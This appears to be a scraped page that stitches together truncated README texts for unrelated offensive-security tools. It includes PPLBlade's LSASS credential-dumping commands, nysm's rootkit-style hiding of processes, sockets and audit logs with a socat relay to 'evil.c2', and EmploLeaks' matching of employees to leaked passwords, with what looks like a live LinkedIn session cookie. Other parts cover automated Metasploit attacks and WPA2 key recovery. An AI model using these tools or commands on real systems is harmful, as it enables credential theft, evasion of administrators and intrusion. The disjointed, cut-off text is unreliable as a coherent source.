RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.
Features
Encrypts specified file types within a target directory.
Changes the desktop wallpaper (Windows only).
Creates and deletes a README file on the desktop with a simulated ransom note.
Simulates communication with a command-and-control server to send system data and receive a decryption key.
Decrypts files after receiving the correct key.
Usage
Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE
Run decoder.py after the files have been encrypted.
Follow the prompts to input the decryption key.
Disclaimer
RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
Contributing
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
Fork the repository.
Create a new branch for your feature or bug fix.
Make your changes and commit them.
Push your changes to your forked repository.
Open a pull request in the main repository.
Contact
For any inquiries or further information, you can reach me through the following channels:
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
Features:
Utilizes a list of proxy IP addresses from a specified file.
Supports both HTTP and HTTPS proxies.
Allows users to input the target website URL, proxy file path, and a static port.
Makes HTTP requests to the specified website using each proxy.
Parses HTML content to extract and visit links on the webpage.
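A minimal sketch of that flow, assuming a proxies.txt with one ip:port entry per line (the helper names are illustrative, not PhantomCrawler's actual internals):

import random
import requests
from bs4 import BeautifulSoup

def load_proxies(path):
    # One "ip:port" entry per line, as described above.
    with open(path) as f:
        return [line.strip() for line in f if line.strip()]

def visit_through_proxy(url, proxy):
    # requests expects a scheme-keyed dict; the same proxy endpoint
    # is used for both HTTP and HTTPS traffic here.
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    resp = requests.get(url, proxies=proxies, timeout=10)
    soup = BeautifulSoup(resp.text, "html.parser")
    # Extract hyperlinks so they can be visited in turn.
    return [a["href"] for a in soup.find_all("a", href=True)]

if __name__ == "__main__":
    proxies = load_proxies("proxies.txt")
    print(visit_through_proxy("https://example.com", random.choice(proxies)))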
Usage:
POC Testing: Simulate website interactions to assess functionality under different proxy setups.
Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.
Get new proxies (with port) and add them to proxies.txt, one per line, in this format: 50.168.163.176:80
You can get them from https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding.
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.
Snapshots:
If you find this GitHub repo useful, please consider giving it a star!
Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.
Features:
Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
Proxy Validation: Efficiently validate proxies using multithreading to save time.
Save to File: Save the list of validated proxies to a file for future use.
Sit back and let Valid8Proxy fetch, validate, and display working proxies.
Save to File:
At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
Check Results:
Review the working proxies in the terminal with color-coded output.
Find the list of working proxies saved in "proxies.txt."
If you already have proxies and just want to validate them, use this:
python Validator.py
Follow the prompts:
Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.
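A minimal sketch of that multithreaded validation idea, assuming each proxy is checked by fetching a known URL (names here are illustrative, not Validator.py's actual code):

from concurrent.futures import ThreadPoolExecutor
import requests

TEST_URL = "https://httpbin.org/ip"  # any reliable endpoint works

def is_alive(proxy, timeout=5):
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        return requests.get(TEST_URL, proxies=proxies, timeout=timeout).ok
    except requests.RequestException:
        return False

def validate(candidates, workers=50):
    # Threads suit this workload: it is I/O bound, so dozens of
    # slow proxies can be checked concurrently.
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(is_alive, candidates)
    return [p for p, ok in zip(candidates, results) if ok]

if __name__ == "__main__":
    with open("proxy_list.txt") as f:
        candidates = [line.strip() for line in f if line.strip()]
    for proxy in validate(candidates):
        print(proxy)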
Contribution:
Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.
Snapshots:
If you find this GitHub repo useful, please consider giving it a star!
Note that PROCEXP152.sys is listed in the source files for compiling purposes. It does not need to be transferred to the target machine alongside PPLBlade.exe.
It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.
Modes:
Dump - Dump process memory using PID or Process Name
Decrypt - Revert an obfuscated (--obfuscate) dump file to its original state
Cleanup - Perform cleanup manually, in case something went wrong during execution (note that the option values should be the same as those used for the execution being cleaned up)
DoThatLsassThing - Dump lsass.exe using the Process Explorer driver (basic PoC)
Handle Modes:
Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:
Basic POC that uses PROCEXP152.sys to dump lsass:
PPLBlade.exe --mode dothatlsassthing
(Note that it does not XOR the dump file; provide the additional --obfuscate flag to enable the XOR functionality)
Upload the obfuscated LSASS dump onto a remote location:
CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Currently, pentesters implicitly select the attack techniques suitable for the target systems. CATSploit uses system configuration information such as OS, open ports and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack (a professional pentester's skill).
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input. First, it gathers information about the target systems. CATSploit supports nmap and OpenVAS for this, and also accepts prior information about the target systems if you have it.
Calculating score values of attack techniques. Using the information obtained in the previous phase and the attack techniques database, evaluation values for capture (eVc) and detectability (eVd) of each attack technique are calculated, per target computer.
Selection of attack techniques by score and construction of the attack scenario. Attack techniques are selected and attack scenarios created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) will be selected, as sketched below.
Execution of the attack scenario. CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase, using Metasploit as a framework and the Metasploit API to execute actual attacks.
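The selection step can be pictured as follows; this is an illustrative sketch of score-based policy selection, not CATSploit's actual implementation (technique names and score values are made up):

# Hypothetical technique records: (name, eVc, eVd), where eVc is the
# capture score and eVd the detectability score, as described above.
techniques = [
    ("T1", 0.8, 0.6),
    ("T2", 0.7, 0.2),
    ("T3", 0.9, 0.9),
]

def select(techniques, policy="stealth"):
    if policy == "stealth":
        # Prefer the hardest-to-detect technique (lowest eVd).
        return min(techniques, key=lambda t: t[2])
    # Otherwise prefer the most likely to succeed (highest eVc).
    return max(techniques, key=lambda t: t[1])

print(select(techniques, policy="stealth"))  # -> ("T2", 0.7, 0.2)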
Prerequisites
CATSploit has the following prerequisites:
Kali Linux 2023.2a
Installation
Metasploit, Nmap and OpenVAS are assumed to be installed as part of the Kali distribution.
Installing CATSploit
To install the latest version of CATSploit, please use the following commands:
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.
DBMS
dbname: database name created for CATSploit
user: username of PostgreSQL
password: password of PostgreSQL
host: If you are using a database on a remote host, specify the IP address of the host
SCENARIO
generator.maxscenarios: Maximum number of scenarios to calculate (*)
ATTACKPF
msfpassword: password of MSFRPCD
openvas.user: username of OpenVAS
openvas.password: password of OpenVAS
openvas.maxhosts: Maximum number of hosts to be tested at the same time (*)
openvas.maxchecks: Maximum number of test items to be run at the same time (*)
ATTACKDB
attack_db_dir: Path to the folder where AttackSteps are stored
(*) Adjust the number according to the specs of your machine.
Usage
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
I've posted the commands and options below as well for reference.
host list: show information about the hosts
  usage: host list [-h]
  options:
    -h, --help  show this help message and exit

host detail: show more information about one host
  usage: host detail [-h] host_id
  positional arguments:
    host_id  ID of the host for which you want to show information
  options:
    -h, --help  show this help message and exit

scenario list: show information about the scenarios
  usage: scenario list [-h]
  options:
    -h, --help  show this help message and exit

scenario detail: show more information about one scenario
  usage: scenario detail [-h] scenario_id
  positional arguments:
    scenario_id  ID of the scenario for which you want to show information
  options:
    -h, --help  show this help message and exit

scan: run network-scan and security-scan
  usage: scan [-h] [--port PORT] target_host [target_host ...]
  positional arguments:
    target_host  IP address to be scanned
  options:
    -h, --help   show this help message and exit
    --port PORT  ports to be scanned

plan: plan attack scenarios
  usage: plan [-h] src_host_id dst_host_id
  positional arguments:
    src_host_id  originating host
    dst_host_id  target host
  options:
    -h, --help  show this help message and exit

attack: execute attack scenario
  usage: attack [-h] scenario_id
  positional arguments:
    scenario_id  ID of the scenario you want to execute
  options:
    -h, --help  show this help message and exit

post find-secret: find confidential information files on the pwned host
  usage: post find-secret [-h] host_id
  positional arguments:
    host_id  ID of the host on which you want to find confidential information
  options:
    -h, --help  show this help message and exit

reset: reset data on the server
  usage: reset [-h] {system} ...
  positional arguments:
    {system}  reset system
  options:
    -h, --help  show this help message and exit

exit: exit CATSploit
  usage: exit [-h]
  options:
    -h, --help  show this help message and exit
Examples
In this example, we use CATSploit to scan the network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.

catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID   ┃ IP           ┃ Hostname ┃ Platform                ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0      │ kali     │ kali 2022.4             │ True  │
│ h_exbiy6 │ 192.168.0.10 │          │ Linux 3.10 - 4.11       │ False │
│ h_nhqyfq │ 192.168.0.20 │          │ Microsoft Windows 7 SP1 │ False │
└──────────┴──────────────┴──────────┴─────────────────────────┴───────┘
With the rise in popularity of offensive tools based on eBPF, ranging from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of system administrators, not only by hiding eBPF, but much more:
bpftool
bpflist-bpfcc
ps
top
sockstat
ss
rkhunter
chkrootkit
lsof
auditd
etc...
All these tools go blind to what goes through nysm. It hides:
New eBPF programs
New eBPF maps
New eBPF links
New Auditd generated logs
New PIDs
New sockets
Warning: This tool is a simple demonstration of eBPF capabilities and, as such, is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.
-d, --detach   Run COMMAND in background
-r, --rm       Self destruct after execution
-v, --verbose  Produce verbose output
-h, --help     Display this help
    --usage    Display a short usage message
Examples
Run a hidden bash:
./nysm bash
Run a hidden ssh and remove ./nysm:
./nysm -r ssh user@domain
Run a hidden socat as a daemon and remove ./nysm:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
How it works
In general
As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.
To differentiate nysm events from the others, everything runs inside a separate PID namespace.
Hide eBPF objects
bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.
Like any eBPF tool, bpftool uses the bpf() system call, specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed to by the attr argument.
To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed-to address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exits, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.
In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.
Hide Auditd logs
Auditd receives its logs from recvfrom(), which stores the messages in a buffer.
If a received message was generated by a nysm process through audit_log_end(), nysm replaces the message length in its nlmsghdr header with 0.
Hide PIDs
Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.
As getdents64() requires looping through all its entries, the eBPF instruction limit is easily reached. Therefore, nysm uses tail calls before reaching it.
Hide sockets
Hiding sockets is a big word. In fact, open sockets are already hidden from many tools, as they cannot find the owning process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag, which returns all currently open sockets. After that, ss receives the result through recvmsg() in a message buffer, and the returned value is the combined length of all these messages.
Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.
These are collected from the connect() and bind() calls.
Limitations
Even with the best effort, nysm still has some limitations.
Any tool that does not close its file descriptors will spot nysm processes created while those descriptors are open. For example, if ./nysm bash is run before top, its processes will not show up. But if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.
Kernel logs: in dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop up several times because of the eBPF verifier when nysm runs.
Many traces written into files are left in place, as hooking read() and write() would be too heavy (though still possible): for example, /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.
Hiding sockets from ss's recvmsg() can be challenging, as a new socket can appear at the beginning of the buffer, where nysm cannot hide it behind a preceding record (this does not apply to PIDs). A quick fix could be to swap the first socket with the next legitimate one, but what if a socket is in the buffer by itself? Therefore, nysm overwrites the first socket's information with hardcoded values.
Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided, as it would hide every non-nysm eBPF object.
Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.
WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.
The script first enumerates all subdomains of the given target domain using assetfinder, sublist3r, subfinder, amass, findomain, hackertarget, riddler and crt.sh, then performs active subdomain enumeration using gobuster with a SecLists wordlist. It filters out the live subdomains using dnsx, extracts their titles using httpx, and scans for subdomain takeover using subjack. It then uses gauplus and waybackurls to crawl all endpoints of those subdomains, applies gf patterns to filter out XSS, LFI, SSRF, SQLi, open redirect and RCE parameters, and scans those parameters for vulnerabilities using various open-source tools (kxss, dalfox, openredirex, nuclei, etc.). Finally, it prints the results of the scan and saves all output in a specified directory (a minimal sketch of this chain follows below).
Extract titles and take screenshots of live subdomains using aquatone & httpx.
Crawl all the endpoints of the subdomains using waybackurls & gauplus and filter out XSS, SQLi, SSRF, etc parameters using gf patterns.
Run different open-source tools (like dalfox, nuclei, sqlmap, etc) to search for vulnerabilities on these parameters and then save all the outputs in the folder.
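To picture the chain, here is a minimal Python sketch that shells out to a few of the tools named above (assuming subfinder, dnsx and httpx are installed and on PATH; WebCopilot itself is a shell script that orchestrates many more tools than this):

import subprocess

def run(cmd, stdin=None):
    # Helper: run a command, feed it stdin, return non-empty stdout lines.
    out = subprocess.run(cmd, input=stdin, capture_output=True, text=True).stdout
    return [line for line in out.splitlines() if line]

domain = "example.com"
subs = sorted(set(run(["subfinder", "-d", domain, "-silent"])))  # passive enum
alive = run(["dnsx", "-silent"], stdin="\n".join(subs))          # keep live hosts
titled = run(["httpx", "-silent", "-title"], stdin="\n".join(alive))  # grab titles
print("\n".join(titled))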
Flags:
  -d  Add your target [Required]
  -o  To save outputs in folder [Default: domain.com]
  -t  Number of threads [Default: 100]
  -b  Add your server for BXSS [Default: False]
  -x  Exclude out of scope domains [Default: False]
  -s  Run only Subdomain Enumeration [Default: False]
  -h  Show this help message
Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server
Installing WebCopilot
WebCopilot requires git to install successfully. Run the following command as root to install WebCopilot:
[❌] Warning: Use with caution. You are responsible for your own actions. [❌] Developers assume no liability and are not responsible for any misuse or damage caused by this tool.
[●] Active Subdomain Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdomain Scanned - [gobuster✔] Subdomains Found: 11
[●] Active Subdomain Scanned - [amass✔] Subdomains Found: 0
[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of subdomains is completed. Check: /subdomains/aquatone/
[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30
Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool. Please use it with caution; you are responsible for your own actions.
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
What does Bugsy do?
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
Analyzes the vulnerability report to identify issues that can be remediated automatically
Produces the code fixes and redirects the user to the fix report page on the Mobb platform
Analyze
Analyzes a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
Produces the code fixes and redirects the user to the fix report page on the Mobb platform
Disclaimer
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not itself detect vulnerabilities in your code; it uses findings detected by the SAST tools mentioned above.
Usage
You can simply run Bugsy from the command line, using npx:
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
How it Works
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.
Installation
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli
pip install -r requirements.txt
OSX
There is a known problem when installing the tool due to the psycopg2 binary. If you run into it, you can solve it by running:
cd cli
python3 -m pip install psycopg2-binary
Basic Usage
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
OSINT tool 🕵 to chain multiple apis
emploleaks>
Right now, the tool supports two functionalities:
LinkedIn, for searching all employees of a company and getting their personal emails.
A GitLab extension, which is capable of finding personal code repositories from the employees.
If defined and connected, while the tool is gathering employee profiles, a search against a COMB database will be made to retrieve leaked passwords.
Retrieving Linkedin Profiles
First, you must set the plugin to use, which in this case is linkedin. Then set your authentication tokens and run the impersonate process:
emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name        Current Setting                      Required  Description
----------  -----------------------------------  --------  -----------------------------------
hide        yes                                  no        hide the JSESSIONID field
JSESSIONID  **************************           no        active cookie session in browser #1
li-at       AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG  no        active cookie session in browser #1
            YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
            cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
            lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
            kyCyfN58SNNH

emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn browser session. You can use the Web Developer Tools to get them: sign in to LinkedIn normally, right-click and choose Inspect, and you will find the cookies in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
Get Linkedin accounts + Leaked Passwords
We created a custom workflow where, using the information retrieved from LinkedIn, we try to match employees' personal emails to potentially leaked passwords. You can connect to a database (in our case, a custom indexed COMB database) using the connect command, as shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will search the database for leaked credentials affecting any of them:
Finally, the tool will generate console output with the following information:
A list of employees of the company (obtained from LinkedIn)
The social network profiles associated with each employee (obtained from email address)
A list of leaked passwords associated with each email address.
How to build the indexed COMB database
An important aspect of this project is the use of the indexed COMB database. To build your own version, you need to download the torrent first. Be careful: the downloaded files plus the indexed version require at least 400 GB of free disk space.
Once the torrent has been completely downloaded, you will get a folder layout like the following:
├── count_total.sh
├── data
│   ├── 0
│   ├── 1
│   │   ├── 0
│   │   ├── 1
│   │   ├── 2
│   │   ├── 3
│   │   ├── 4
│   │   ├── 5
│   │   ├── 6
│   │   ├── 7
│   │   ├── 8
│   │   ├── 9
│   │   ├── a
│   │   ├── b
│   │   ├── c
│   │   ├── d
│   │   ├── e
│   │   ├── f
│   │   ├── g
│   │   ├── h
│   │   ├── i
│   │   ├── j
│   │   ├── k
│   │   ├── l
│   │   ├── m
│   │   ├── n
│   │   ├── o
│   │   ├── p
│   │   ├── q
│   │   ├── r
│   │   ├── s
│   │   ├── symbols
│   │   ├── t
At this point, you can import all those files with the create_db command:
The importer takes a long time, so we recommend running it with patience.
Next Steps
We are integrating other public sites and applications that may offer information about leaked credentials. We may not be able to see the plaintext password, but it will give insight into whether the user has any compromised credentials:
Integration with Have I Been Pwned?
Integration with Firefox Monitor
Integration with Leak Check
Integration with BreachAlarm
Also, we will focus on gathering even more information about every employee from public sources. Do you have an idea in mind? Don't hesitate to reach out to us:
optional arguments:
  -u , --url        Target URL (e.g. http://example.com/ )
  -f , --file       Select a target hosts list file (e.g. list.txt )
  --proxy           Proxy (e.g. http://127.0.0.1:8080)
  -l, --login       run only Login panel Detector Module
  -s, --sqli        run only POST Form SQLi Scanning Module with provided Login panels Urls
  -n , --inputname  Customize actual username input for SQLi scan (e.g. 'username' or 'email')
  -t , --threads    Number of threads (default 30)
  -h, --help        Show this help message and exit
Screenshots
Development
TODO
adding "POST form SQli (Time based) scanning" and check for delay
Fuzz URL paths so as not to miss any login panels
Easy EASM is just that... the easiest-to-set-up tool to give your organization visibility into its external-facing assets.
The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.
With ten lines of setup or less, using open-source tools and one-button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans daily and alerts you via Slack or Discord about newly found assets! It also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.
Installation
go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest
Example config file
The tool expects a configuration file named config.yml to be in the directory you are running from.
Here is an example of this YAML file:
# EasyEASM configurations
runConfig:
  domains: # List root domains here.
    - example.com
    - mydomain.com
  slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
  discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
  runType: fast # Set to either fast (passive enum) or complete (active enumeration).
  activeWordList: subdomainWordlist.txt
  activeThreads: 100
Usage
To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:
./easyeasm
After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!
Warranty
The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.
The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.
The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.
Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.
By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.
License
This project is licensed under the MIT License - see the LICENSE.md for details.
Contact
For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
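For reference, the standard 802.11 derivation those functions implement looks roughly like this (a sketch of the published definition, not the tool's exact code):

import hashlib
import hmac

def calculate_pmkid(psk: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID
    # (4096 iterations, 32-byte key, per the 802.11 standard).
    pmk = hashlib.pbkdf2_hmac("sha1", psk.encode(), ssid.encode(), 4096, 32)
    # PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" | AP MAC | STA MAC).
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

# Example (illustrative values): MACs are raw 6-byte addresses.
print(calculate_pmkid("password123", "MyWiFi",
                      bytes.fromhex("aabbccddeeff"),
                      bytes.fromhex("112233445566")).hex())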
Obtaining the PMKID
Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL message 1 of the handshake. Follow the next three steps to obtain the fields needed for the arguments.
Open the pcap in Wireshark:
Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
In the EAPOL 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and client MAC.
In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is below.
If the access point is vulnerable, you should see the PMKID value, as in the screenshot below:
Demo Run
Disclaimer
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
Install
You must have CGO enabled, and may have to install gcc to run CloudRecon:
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
Description
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.
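The core idea can be sketched in a few lines. This Python equivalent (CloudRecon itself is written in Go) connects to an IP, grabs the certificate without validation, and reads out the CN and SANs:

import socket
import ssl
from cryptography import x509
from cryptography.x509.oid import NameOID

def cert_names(ip: str, port: int = 443, timeout: int = 4):
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # self-signed dev certs are exactly the point
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=ip) as tls:
            der = tls.getpeercert(binary_form=True)
    cert = x509.load_der_x509_certificate(der)
    cns = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
        sans = ext.value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        sans = []
    return cns, sans

print(cert_names("93.184.216.34"))  # illustrative IP; scan your own scope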
The tool suite has three parts, written in Go:
Scrape - a live tool to inspect the ranges for a keyword in SSL certs' CN and SAN fields in real time.
Store - a tool to retrieve IPs' certs and download all their Orgs, CNs, and SANs, so you can have your OWN crt.sh-style database.
Retr - a tool to parse and search through the downloaded certs for keywords.
Usage
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store  - Scrape and collect Orgs, CNs, SANs in local db file
cloudrecon retr   - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File>
  -a         Add this flag if you want to see all output including failures
  -c int     How many goroutines running concurrently (default 100)
  -h         print usage!
  -i string  Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
  -p string  TLS ports to check for certificates (default "443")
  -t int     Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File>
  -c int      How many goroutines running concurrently (default 100)
  -db string  String of the DB you want to connect to and save certs! (default "certificates.db")
  -h          print usage!
  -i string   Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
  -p string   TLS ports to check for certificates (default "443")
  -t int      Timeout for TLS handshake (default 4)
RETR
retr [options]
